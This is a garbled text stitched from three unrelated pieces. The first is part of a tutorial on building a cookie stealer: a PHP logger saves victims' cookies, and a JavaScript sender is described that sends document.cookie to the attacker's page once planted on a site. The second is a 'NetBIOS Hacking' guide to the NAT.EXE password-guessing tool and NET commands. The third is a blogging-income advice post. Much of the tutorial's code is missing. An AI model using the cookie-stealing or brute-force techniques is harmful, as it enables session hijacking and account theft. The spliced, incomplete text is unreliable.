fwrite($file, $cookie . "\n\n"); // line 4
?> // line 5

Lines 1 and 2 are the same as before.
Line 3 opens the file "cookielog.txt" for writing, then stores the file's handle in $file.
Line 4 writes the cookie to the file which has its handle in $file. The period between $cookie and "\n\n" combines the two strings as one. The "\n\n" acts as a double line-break, making it easier for us to sift through the log file.
Line 5 is the same as before.

Step Two: Implementing the Stealer

The hardest part (usually) of making a cookie stealer is finding a way to use the sender. The simplest method requires use of HTML and JavaScript, so you have to be sure that your environment supports those two. Here is an example of a sender.

// Line 3

Line 1 tells the browser that the following chunk of code is to be interpereted as JavaScript.
Line 2 adds document.cookie to the end of the URL, which is then stored in document.location. Whenever document.location is changed, the browser is redirected to that URL.
Line 3 tells the browser to stop reading the code as JavaScript (return to HTML).

There are two main ways of implementing the sender:

You can plant your sender where the victim will view it as an HTML document with his browser. In order to do that, you have to find some way to actually post the code somewhere on the site.

NetBIOS Hacking

This is for an Educational purpose only

All viewers please keep in mind one thing that all this information her is given for informational purpose so please dnt misuse of your knowledge

NetBIOS Attack MethodsThis NetBIOS attack technique was verified on Windows 95, NT 4.0 Workstation, NT 4.0 Server, NT 5.0 beta 1 Workstation, NT 5.0 beta 1 Server, Windows 98 beta 2.1. One of the components being used is NAT.EXEA discussion of the tool, it switches, and common techniques follows:

NAT.EXE [-o filename] [-u userlist] [-p passlist]

Switches:

-o Specify the output file. All results from the scan

will be written to the specified file, in addition

to standard output.

-u Specify the file to read usernames from. Usernames

will be read from the specified file when attempt-

ing to guess the password on the remote server.

Usernames should appear one per line in the specified file.

-p Specify the file to read passwords from. Passwords

will be read from the specified file when attempting to guess the password on the remote server.

Passwords should appear one per line in the specified file.

Addresses should be specified in comma deliminated

format, with no spaces. Valid address specifications include:

hostname - "hostname" is added

127.0.0.1-127.0.0.3, adds addresses 127.0.0.1

through 127.0.0.3

127.0.0.1-3, adds addresses 127.0.0.1 through

127.0.0.3

127.0.0.1-3,7,10-20, adds addresses 127.0.0.1

through 127.0.0.3, 127.0.0.7, 127.0.0.10 through

127.0.0.20.

hostname,127.0.0.1-3, adds "hostname" and 127.0.0.1

through 127.0.0.1

All combinations of hostnames and address ranges as

specified above are valid.

[8.0.1] Comparing NAT.EXE to Microsoft's own executables

[8.0.2] First, a look at NBTSTAT

First we look at the NBTSTAT command. This command was discussed in earlier portions of the book ( [5.0.6] The Nbtstat Command ). In this section, you will see a demonstration of how this tool is used and how it compares to other Microsoft tools and non Microsoft tools.

What follows is pretty much a step by step guide to using NBTSTAT as well as extra information. Again, if youre interested in more NBSTAT switches and functions, view the [5.0.6] The Nbtstat Command portion of the book.

[8.0.3] Intro to the NET commands

The NET command is a command that admins can execute through a dos window to show information about servers, networks, shares, and connections. It also has a number of command options that you can use to add user accounts and groups, change domain settings, and configure shares. In this section, you will learn about these NET commands, and you will also have the outline to a NET command Batch file that can be used as a primitive network security analysis tool. Before we continue on with the techniques, a discussion of the available options will come first:

[8.0.4] Net Accounts: This command shows current settings for password, logon limitations, and domain information. It also contains options for updating the User accounts database and modifying password and logon requirements.

[8.0.5] Net Computer: This adds or deletes computers from a domains database.

[8.0.6] Net Config Server or Net Config Workstation: Displays config info about the server service. When used without specifying Server or Workstation, the command displays a list of configurable services.

[8.0.7] Net Continue: Reactivates an NT service that was suspended by a NET PAUSE command.

[8.1.0] Net Help: Help with these commands

[8.1.1] Net Helpmsg message#: Get help with a particular net error or function message.

[8.1.2] Net Localgroup: Use this to list local groups on servers. You can also modify those groups.

[8.1.3] Net Name: This command shows the names of computers and users to which messages are sent on the computer.

[8.1.4] Net Pause: Use this command to suspend a certain NT service.

[8.1.5] Net Print: Displays print jobs and shared queues.

Last night I was chatting with a blogger who was feeling completely overwhelmed with their goal of making a living from blogging.

I asked them how much they wanted to make from blogging.

They responded that they wanted to be a full time blogger.

I pushed them for a figure – what does ‘full time’ mean for you?

They thought for a moment and said that they could live off $30,000 USD a year (note: they wouldn’t have minded earning more but would be able to quit their current job at this kind of rate).

$30,000 a year sounds like a lot to make from a blog – especially when you’re starting out and are yet to make a dollar. To this blogger it seemed so overwhelming that she had almost convinced herself that it was not possible.

Advice for Becoming a Full Time Blogger

My response was threefold:

1. Don’t Give Up Your Day Job…. Yet

It is possible to make $30,000 a year blogging, but it’s unlikely to happen over night. Keep your feet on the ground and your expectations reasonable. IF it happens (and there are no guarantees) it is almost certainly going to take some time.

2. Be Specific

Saying that you want to be full time as a blogger is a great goal – but it’s not really specific enough. This is why I wanted the blogger I was chatting with to name a figure. For her full time was $30,000 – for others it could be more or less – the amount is not the point, the point is that you need something more concrete to work towards so that you’re able to measure where you’re at.

For me when I decided I want to go full time as a blogger I decided that I wanted to aim for $50,000 (Aussie Dollars) in a year as the bench mark (at that time $50,000 was around 36,000 USD). That’s around what I would have been earning in my current main job if I had been doing that full time (I was actually working a number of part time jobs at the time as well as studying part time).

Knowing what I was aiming for helped me in a number of ways when it came to getting to that goal.

3. Break it down into something more Achievable

$30,000 USD still sounds big when you’re a new blogger – and in some ways it is. However there are different ways of thinking about that figure. Lets break it down in the way that I used to look at my target.

$30,000 a year = $576.92 per week

$30,000 a year = $82.19 a day

$30,000 a year = $3.42 an hour

We could break it down on a monthly or on a minute by minute basis if we wanted to (in fact I did do it by minute from time to time for fun) – but the exercise is really about helping you to see that perhaps your big goal is a little more achievable if you are to break it down. Making $82.19 somehow seems a little bit easier to me than making $30,000 (or is that just me?).

OK – the other way that I used to break down my goal that I found really helpful to me was to do it based upon what I need to achieve to meet that target. For me I would usually look at the daily figure – in this case $82.19.

What do I need to do to make $82.19 a day ($30,000 a year)?

Well there’s a number of ways that much. Lets look at a few:

CPC Ads – lets say we’re running mainly AdSense on our blog and that the average click is paying 5 cents. That equates to 1643 clicks on AdSense ads (note: AdSense also runs CPM ads so it’s not quite as simple as saying you need 1643 clicks… but to keep this simple lets just go with that).

CPM Ads – lets say that we’re running CPM ads on our blog and we’re being paid $2 CPM per ad unit and we had 3 ads on each page (which is effectively $6 CPM per page). This would mean we’d need 13,000 page impressions.

Monthly Sponsorships – one way to sell ads directly to advertisers is to sell ads on a month by month basis as a sponsorship. To make $30k in a year you need to sell $2500 a month in ads. You might have 6 ad spots on your blog so this is 6 advertisers at $416.66 per advertiser per month.

Low Commission Affiliate Products – Lets say we were promoting affiliate products from a site like Amazon and your commissions were on average about 40 cents per sale. To earn $82.19 you’d need to sell 205 products.

High Commission Affiliate Products – In this case you might be promoting ebooks and earning $8 a copy (that’s what you’d earn selling my 31DBBB ebook per commission). The math is simple on this one – you’d had to sell around 10 e-books a day.

Really Big Commission Affiliate Products – of course e-books are not the biggest product out there to promote – there are products like training courses where you can earn hundreds per sale. Lets take one that might pay out $300 for a yearly membership on a bigger product. In this case you need to sell 8 of these per month.

Selling Your Own E-book – got your own product, perhaps an e-book, to sell from your blog? At $19.95 a sale you need to sell just over 4 of these a day. You can do the sums on cheaper or more expensive products.

Of course there are many many other ways to make money from blogs. Subscriptions, donations, paid reviews, selling yourself as a consultant….. etc. You can do the sums for yourself on your own model.

I know that some of the above figures still sound out of reach for bloggers – 1643 clicks on your AdSense ads sounds massive to a new blogger…. and it is – but do keep in mind that you can combine some of the above (in fact I’d recommend you diversify your income).

You might run 2 ad networks on your site, promote Amazon affiliates, sell your own e-book and promote someone’s membership course.

Looking back on my own figures for around the time when I hit my $50,000 AUD (around $100 USD a day) goal and for me at that time my income mix looked a like this (going from memory here):

AdSense: $35

Chitika: $20

Private Ad Sales: $20

Amazon: $15

Other Affiliate Commissions: $10

Note: I didn’t achieve this milestone until I’d been blogging for over 2 years (I blogged for the first year without trying to make money).

This didn’t happen over night (let me emphasize this – blogging for money is neither quick nor is it easy money) but I really found that breaking things down into more bite sized pieces helped me to stay motivated but also helped me to identify what I needed to work on in order to reach my goals (and for me to quite my day job).

Again – don’t quit your day job yet (in fact you may not want to quit it even when you reach your goal – it can be good to have a back up plan) but do work hard at being specific about your blogging goals and attempt to break it down in a way that helps you move towards them.
